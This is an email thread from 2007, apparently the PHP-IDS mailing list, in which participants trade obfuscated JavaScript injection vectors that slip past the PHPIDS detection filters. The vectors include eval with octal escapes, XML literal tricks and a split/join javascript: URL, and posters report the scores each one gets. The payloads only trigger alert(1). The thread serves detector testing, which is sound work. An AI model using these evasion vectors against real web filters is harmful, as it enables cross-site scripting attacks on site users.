By the way, I just tried the demo javascript (minus the script tags)
at demo.php-ids.org... It triggered 16 filters and a score of 71!
On Sep 16, 4:31 pm, "Mario Heiderich" <mario.heider...@googlemail.com>
wrote:
> @David: Sounds interesting but I can't find the link.
>
> "DAMN! What a screwy language." (cite from p42 page)
> Yes - I totally agree with you. Xorrers latest vectors prove that once again
> ;)
>
> Greetings,
> .mario
>
> 2007/9/16, thornmaker <thornma...@gmail.com>:
>
>
>
>
>
> > This is only partially related to the IDS, but working on these
> > injections inspired me to put together a demo page of some of the
> > weird stuff you can do with javascript. There is a brief writeup on
> > my site athttp://p42.us/ including the link to the demo text. I had
> > to leave some of the obfuscation techniques out because I want it to
> > work in both Firefox and IE. Please let me know if you have any
> > suggestions for improvements!
>
> > By the way, I just tried the demo javascript (minus the script tags)
> > at demo.php-ids.org... It triggered 16 filters and a score of 71!
>
> --
> _______________________
> php-ids.org
I think Mario was updating the filters when I tried this one so it
didn't get through, if I had more time I'd write another one but I'm
sure someone else will be able to use this idea
On Sep 16, 9:55 pm, thornmaker <thornma...@gmail.com> wrote:
> Hmm... I'll see about making the link more clear. In the meantime,
> try this:http://p42.us/stuff/wtf.txt
> and to see how it executes:http://p42.us/stuff/wtf.html
>
> On Sep 16, 4:31 pm, "Mario Heiderich" <mario.heider...@googlemail.com>
> wrote:
>
>
>
>
>
> > @David: Sounds interesting but I can't find the link.
>
> > "DAMN! What a screwy language." (cite from p42 page)
> > Yes - I totally agree with you. Xorrers latest vectors prove that once again
> > ;)
>
> > Greetings,
> > .mario
>
> > 2007/9/16, thornmaker <thornma...@gmail.com>:
>
> > > This is only partially related to the IDS, but working on these
> > > injections inspired me to put together a demo page of some of the
> > > weird stuff you can do with javascript. There is a brief writeup on
> > > my site athttp://p42.us/including the link to the demo text. I had
> > > > my site athttp://p42.us/includingthe link to the demo text. I had
> > > > > my site athttp://p42.us/includingthelink to the demo text. I had
You where right. http://groups.google.com/group/php-ids/msg/74ba23034387d28d
Cool stuff man! I knew it :D
On Sep 17, 10:08 am, xorrer <obhvsbypqg...@gmail.com> wrote:
> @Gareth
>
> You where right.http://groups.google.com/group/php-ids/msg/74ba23034387d28d
x=eval,1,1,1;1;
1,1,1,b='\\',1,1,1;
1,1,1,s='\'',1,1,1;
1,1,1,o='0',1,1,1;
x( x(s+b+141+b+154+b+145+b+162+b+164+b+o+50+b+o+61+b+o+51+s) );
I'd get it work around the filters but I can't be arsed plus I've got
a lot on. Tested under Opera, may work in IE though
I thought this was cool, it gets a score of 5:-
new Image().src= !null?'javascriptz:zalertz(1)'['split']('z')['join']
([]):0
I'd get it work around the filters but I can't be arsed plus I've got
a lot on. Tested under Opera, may work in IE though
On Sep 18, 1:17 pm, Gareth <gazhe...@gmail.com> wrote:
> Eval + Unicode attack:-
>
> x=eval,1,1,1;1;
> 1,1,1,b='\\',1,1,1;
> 1,1,1,s='\'',1,1,1;
> 1,1,1,o='0',1,1,1;
> x( x(s+b+141+b+154+b+145+b+162+b+164+b+o+50+b+o+61+b+o+51+s) );
>
> On Sep 18, 4:41 am, thornmaker < thornma...@gmail.com> wrote:
>
> > good stuff everyone. it's fun having new things to play with
>
> > On Sep 17, 9:56 am, Gareth < gazhe...@gmail.com> wrote:
>
> > > More XML based stuff:-
> > > a=<r><s>eva</s><s>l</s><a>ale</a><a>rt</a><a>(1)</a></r>
> > > 0[a.s.text()](a.a.text()+'')
>
> > > On Sep 17, 12:27 pm, Gareth <gazhe...@gmail.com> wrote:
>
> > > > This one is cool:-
> > > > o={x:''+<s>eva</s>+<s>l</s>,y:''+<s>aler</s>+<s>t</s>+<s>(1)</
> > > > s>};function f() { 0[this.x](this.y ) }f.call(o);
>
> > > > On Sep 17, 10:21 am, Gareth <gazhe...@gmail.com> wrote:
>
> > > > > @xorrer I'm on MSN Messenger if you're interested in a new contact :)
>
> > > > > On Sep 17, 10:11 am, Gareth <gazhe...@gmail.com> wrote:
>
> > > > > > @xorrer
>
> > > > > > Cool stuff man! I knew it :D
>
> > > > > > On Sep 17, 10:08 am, xorrer <obhvsbypqg...@gmail.com> wrote:
>
> > > > > > > @Gareth
>
> > > > > > > You where right.http://groups.google.com/group/php-ids/msg/74ba23034387d28d
>
> > > > > > > On Sep 17, 12:27 am, Gareth <gazhe...@gmail.com> wrote:
>
> > > > > > > > Here's one that didn't work but you might find the xml tags
> > > > > > > > interesting:-
> > > > > > > > s1=<s>evalalerta(1)a</s>,s2=<s></s>+'',s3=s1+s2,e1=/s/!=/s/?s3[0]:
> > > > > > > > 0,e2=/s/!=/s/?s3[1]:0,e3=/s/!=/s/?s3[2]:0,e4=/s/!=/s/?s3[3]:0,e=/s/!=/
> > > > > > > > s/?0[e1+e2+e3+e4]:0,a1=/s/!=/s/?s3[4]:0,a2=/s/!=/s/?s3[5]:0,a3=/s/!=/
> > > > > > > > s/?s3[6]:0,a4=/s/!=/s/?s3[7]:0,a5=/s/!=/s/?s3[8]:0,a6=/s/!=/s/?s3[10]:
> > > > > > > > 0,a7=/s/!=/s/?s3[11]:0,a8=/s/!=/s/?s3[12]:
> > > > > > > > 0,a=a1+a2+a3+a4+a5+a6+a7+a8,1,e(a)
>
> > > > > > > > I think Mario was updating the filters when I tried this one so it
> > > > > > > > didn't get through, if I had more time I'd write another one but I'm
> > > > > > > > sure someone else will be able to use this idea